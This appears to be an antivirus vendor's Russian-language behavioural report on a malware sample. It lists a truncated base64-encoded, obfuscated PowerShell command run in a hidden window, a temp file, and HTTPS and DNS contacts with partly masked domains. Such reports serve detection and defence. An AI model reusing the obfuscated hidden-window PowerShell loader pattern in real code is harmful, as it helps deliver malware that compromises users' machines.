Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1432
- %TEMP%\848583.cvr
- 'yi###course.com':443
- 'es###ohouse.com':443
- 'zi####migration.com':443
- 'wi###omhub.com':443
- 'yi###course.com':443
- 'es###ohouse.com':443
- 'zi####migration.com':443
- DNS ASK yi###course.com
- DNS ASK es###ohouse.com
- DNS ASK 77##ns.club
- DNS ASK la###roup.net
- DNS ASK zi####migration.com
- DNS ASK vi####otpulsa.com
- DNS ASK wi###omhub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUg... (со скрытым окном)